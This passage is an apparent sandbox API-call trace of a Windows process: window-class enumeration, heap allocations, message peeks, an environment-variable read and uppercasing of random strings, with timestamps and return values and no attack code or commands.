GetClassNameW (in: hWnd=0x1022e, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="Clear_app") returned 9 [0122.544] GetClassNameW (in: hWnd=0x10222, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="Watch") returned 5 [0122.544] GetClassNameW (in: hWnd=0x10230, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="whosouthapp") returned 11 [0122.544] GetClassNameW (in: hWnd=0x10226, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="raiseLeftbuyclass") returned 17 [0122.544] GetClassNameW (in: hWnd=0x10218, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="Knowledgesignwin") returned 16 [0122.544] GetClassNameW (in: hWnd=0x1020e, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="Dropwindow") returned 10 [0122.545] GetClassNameW (in: hWnd=0x1020c, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="that_but_class") returned 14 [0122.545] GetClassNameW (in: hWnd=0x10206, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="claim_wnd") returned 9 [0122.545] GetClassNameW (in: hWnd=0x10204, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="Quite_Do_class") returned 14 [0122.545] GetClassNameW (in: hWnd=0x30122, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0122.546] GetClassNameW (in: hWnd=0x30036, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0122.546] GetClassNameW (in: hWnd=0x3003e, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0122.546] GetClassNameW (in: hWnd=0x30070, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0122.546] GetClassNameW (in: hWnd=0x201e0, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="OleDdeWndClass") returned 14 [0122.546] GetClassNameW (in: hWnd=0x401f2, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0122.546] GetClassNameW (in: hWnd=0x30288, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0122.546] GetClassNameW (in: hWnd=0x30126, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="IEFrame") returned 7 [0122.547] GetClassNameW (in: hWnd=0x2012c, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="DDEMLEvent") returned 10 [0122.547] GetClassNameW (in: hWnd=0x20084, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="DDEMLMom") returned 8 [0122.548] GetClassNameW (in: hWnd=0x301fe, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0122.548] GetClassNameW (in: hWnd=0x201fa, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0122.548] GetClassNameW (in: hWnd=0x101be, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="ATL:00007FFB1C177080") returned 20 [0122.548] GetClassNameW (in: hWnd=0x101b8, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0122.549] GetClassNameW (in: hWnd=0x101aa, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="SystemTray_Main") returned 15 [0122.549] GetClassNameW (in: hWnd=0x101a6, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0122.549] GetClassNameW (in: hWnd=0x101a4, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="OleDdeWndClass") returned 14 [0122.549] GetClassNameW (in: hWnd=0x1018e, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="COMTASKSWINDOWCLASS") returned 19 [0122.549] GetClassNameW (in: hWnd=0x10110, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0122.549] GetClassNameW (in: hWnd=0x10118, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="TabletModeCoverWindow") returned 21 [0122.550] GetClassNameW (in: hWnd=0x20152, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0122.550] GetClassNameW (in: hWnd=0x1019a, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0122.550] GetClassNameW (in: hWnd=0x10116, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="DummyDWMListenerWindow") returned 22 [0122.551] GetClassNameW (in: hWnd=0x1010e, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="EdgeUiInputTopWndClass") returned 22 [0122.551] GetClassNameW (in: hWnd=0x100f4, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0122.551] GetClassNameW (in: hWnd=0x100f0, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="PushNotificationsPowerManagement") returned 32 [0122.551] GetClassNameW (in: hWnd=0x100ee, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="OleDdeWndClass") returned 14 [0122.552] GetClassNameW (in: hWnd=0x100ea, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="ApplicationManager_DesktopShellWindow") returned 37 [0122.552] GetClassNameW (in: hWnd=0x100e6, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0122.552] GetClassNameW (in: hWnd=0x100e4, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0122.552] GetClassNameW (in: hWnd=0x200da, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0122.553] GetClassNameW (in: hWnd=0x100c0, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="tooltips_class32") returned 16 [0122.553] GetClassNameW (in: hWnd=0x702b8, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="URL Moniker Notification Window") returned 31 [0122.553] GetClassNameW (in: hWnd=0x20040, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="MS_WebcheckMonitor") returned 18 [0122.553] GetClassNameW (in: hWnd=0x2001c, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="BluetoothNotificationAreaIconWindowClass") returned 40 [0122.553] GetClassNameW (in: hWnd=0x20030, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="Windows.UI.Core.CoreWindow") returned 26 [0122.554] GetClassNameW (in: hWnd=0x2002e, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="PNIHiddenWnd") returned 12 [0122.554] GetClassNameW (in: hWnd=0x40038, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0122.554] GetClassNameW (in: hWnd=0x101cc, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0122.554] GetClassNameW (in: hWnd=0x101c8, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="WorkerW") returned 7 [0122.554] GetClassNameW (in: hWnd=0x100ac, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="NotifyIconOverflowWindow") returned 24 [0122.555] GetClassNameW (in: hWnd=0x10078, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="DDEMLEvent") returned 10 [0122.555] GetClassNameW (in: hWnd=0x10074, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="DDEMLMom") returned 8 [0122.555] GetClassNameW (in: hWnd=0x10022, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="Dwm") returned 3 [0122.555] GetClassNameW (in: hWnd=0x2002a, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="CicLoaderWndClass") returned 17 [0122.556] GetClassNameW (in: hWnd=0x3035e, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="Internet Explorer_Hidden") returned 24 [0122.556] GetClassNameW (in: hWnd=0x100d0, lpClassName=0x7df038, nMaxCount=1024 | out: lpClassName="Progman") returned 7 [0122.556] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fec90 [0122.556] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef790 [0122.556] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fed80 [0122.556] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8a0 [0122.557] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef790 | out: hHeap=0x12c0000) returned 1 [0122.557] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12d7830 | out: hHeap=0x12c0000) returned 1 [0122.557] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef710 [0122.557] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0122.557] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0122.557] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0122.557] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0122.557] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd160 | out: hHeap=0x12c0000) returned 1 [0122.558] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef890 | out: hHeap=0x12c0000) returned 1 [0122.558] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0122.558] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0122.558] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef10 | out: hHeap=0x12c0000) returned 1 [0122.558] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0122.558] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef760 | out: hHeap=0x12c0000) returned 1 [0122.558] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458818 [0122.558] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0122.559] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458818 | out: hHeap=0x12c0000) returned 1 [0122.559] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0122.559] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14a3190 | out: hHeap=0x12c0000) returned 1 [0122.559] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1c0 | out: hHeap=0x12c0000) returned 1 [0122.559] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0122.559] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0122.559] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20a) returned 0x1302b30 [0122.559] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef830 [0122.559] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x7df738, nSize=0x104 | out: lpBuffer="") returned 0x15 [0122.559] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd160 [0122.559] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x30) returned 0x1300b98 [0122.559] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef760 [0122.560] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1302b30 | out: hHeap=0x12c0000) returned 1 [0122.560] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0122.560] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0122.560] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491af8 [0122.560] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1c0 [0122.560] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x80) returned 0x148e2e0 [0122.561] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1300b98 | out: hHeap=0x12c0000) returned 1 [0122.561] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1c0 | out: hHeap=0x12c0000) returned 1 [0122.561] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491af8 | out: hHeap=0x12c0000) returned 1 [0122.561] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0122.561] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0122.561] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12feb00 [0122.561] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd280 [0122.561] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef750 [0122.561] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd280 | out: hHeap=0x12c0000) returned 1 [0122.561] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef10 [0122.561] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd280 [0122.562] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2e0 [0122.562] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd160 | out: hHeap=0x12c0000) returned 1 [0122.562] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0122.562] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0122.562] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x14a3190 [0122.562] CharUpperBuffW (in: lpsz="KGGJMOBCJUETCWRTLNXKZGWSZXBPV", cchLength=0x1d | out: lpsz="KGGJMOBCJUETCWRTLNXKZGWSZXBPV") returned 0x1d [0122.562] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14a3190 | out: hHeap=0x12c0000) returned 1 [0122.562] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0122.562] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0122.562] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x1) returned 0x12ef770 [0122.562] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fedd0 [0122.562] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0122.562] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef780 [0122.562] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0122.563] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef780 | out: hHeap=0x12c0000) returned 1 [0122.563] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x1) returned 0x12ef8b0 [0122.563] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd160 [0122.563] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef850 [0122.563] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1c0 [0122.563] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0122.563] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x1) returned 0x12ef7a0 [0122.563] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0122.563] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6d0 [0122.563] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6d0 | out: hHeap=0x12c0000) returned 1 [0122.563] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x1) returned 0x12ef8c0 [0122.563] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0122.563] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef780 [0122.563] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef780 | out: hHeap=0x12c0000) returned 1 [0122.564] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x1) returned 0x12ef7b0 [0122.564] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0122.564] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0122.564] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0122.564] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd298 [0122.564] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0122.564] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0122.564] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7d0 [0122.564] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0122.564] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0122.564] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0122.564] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0122.564] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef860 [0122.564] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0122.565] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee98 [0122.565] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0122.565] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd628 [0122.565] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febf0 [0122.565] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd400 [0122.565] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7f0 [0122.565] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd4d8 [0122.565] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fec18 [0122.565] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd658 [0122.565] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6f0 [0122.565] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd598 [0122.565] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fec40 [0122.565] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd6b8 [0122.565] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7e0 [0122.565] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd5f8 [0122.566] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x14a3580 [0122.566] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0122.566] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff190 [0122.566] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd5e0 [0122.566] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef790 [0122.566] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd5e0 | out: hHeap=0x12c0000) returned 1 [0122.566] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff230 [0122.566] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd418 [0122.566] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd4a8 [0122.566] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0122.566] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd4a8 | out: hHeap=0x12c0000) returned 1 [0122.566] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0122.566] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0122.566] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff140 [0122.566] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd6a0 [0122.566] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef780 [0122.566] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd6a0 | out: hHeap=0x12c0000) returned 1 [0122.566] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff488 [0122.566] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd688 [0122.567] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd550 [0122.567] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0122.567] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd550 | out: hHeap=0x12c0000) returned 1 [0122.567] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0122.567] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0122.567] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff028 [0122.567] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd430 [0122.567] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0122.567] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd5b0 [0122.567] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0122.567] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0122.567] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0122.567] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0122.567] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458818 [0122.567] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0122.567] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6d0 [0122.567] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef830 [0122.568] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b98 [0122.568] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b98 | out: hHeap=0x12c0000) returned 1 [0122.568] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0122.568] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6d0 | out: hHeap=0x12c0000) returned 1 [0122.568] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458bd8 [0122.568] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0122.568] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef880 [0122.568] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff000 [0122.568] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd5e0 [0122.568] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0122.568] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef820 [0122.568] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x30) returned 0x13011f0 [0122.568] CharUpperBuffW (in: lpsz="DJVLLWQLKATZJRZPICPARXZ", cchLength=0x17 | out: lpsz="DJVLLWQLKATZJRZPICPARXZ") returned 0x17 [0122.568] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13011f0 | out: hHeap=0x12c0000) returned 1 [0122.568] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0122.568] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff348 [0122.568] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x1) returned 0x12ef830 [0122.569] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff050 [0122.569] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd460 [0122.569] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef890 [0122.569] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd5c8 [0122.569] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef890 | out: hHeap=0x12c0000) returned 1 [0122.569] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x1) returned 0x12ef820 [0122.569] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd4c0 [0122.569] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef840 [0122.569] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd610 [0122.569] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef840 | out: hHeap=0x12c0000) returned 1 [0122.569] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd448 [0122.569] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff2a8 [0122.570] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd580 [0122.570] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef840 [0122.570] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd4a8 [0122.570] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd640 [0122.570] RtlAllocateHeap 